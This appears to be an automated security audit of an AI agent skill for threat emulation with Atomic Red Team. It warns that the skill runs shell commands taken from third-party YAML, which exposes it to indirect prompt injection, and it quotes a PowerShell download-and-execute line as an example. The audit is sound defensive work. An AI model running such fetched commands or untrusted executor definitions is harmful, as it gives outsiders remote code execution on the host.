skills/mukul975/anthropic-cybersecurity-skills/performing-threat-emulation-with-atomic-red-team/Snyk
performing-threat-emulation-with-atomic-red-team
Warn
Audited by Snyk on Apr 7, 2026
Risk Level: MEDIUM
Full Analysis
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). This skill explicitly instructs cloning the public Atomic Red Team repo (SKILL.md and references/api-reference.md point to https://github.com/redcanaryco/atomic-red-team) and scripts/agent.py loads YAML from ./atomic-red-team/atomics and directly interprets and executes executor commands (via subprocess.run with shell=True), so untrusted, third‑party test definitions can control runtime actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The agent depends on atomic test definitions from https://github.com/redcanaryco/atomic-red-team (cloned/loaded at runtime) whose YAML executors can contain commands like IEX (New-Object Net.WebClient).DownloadString('#{url}') (example default https://example.com/test) that fetch and execute remote code, so external URLs in those atomics would directly cause remote code execution when tests run.
Issues (2)
W011
MEDIUMThird-party content exposure detected (indirect prompt injection risk).
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
Audit Metadata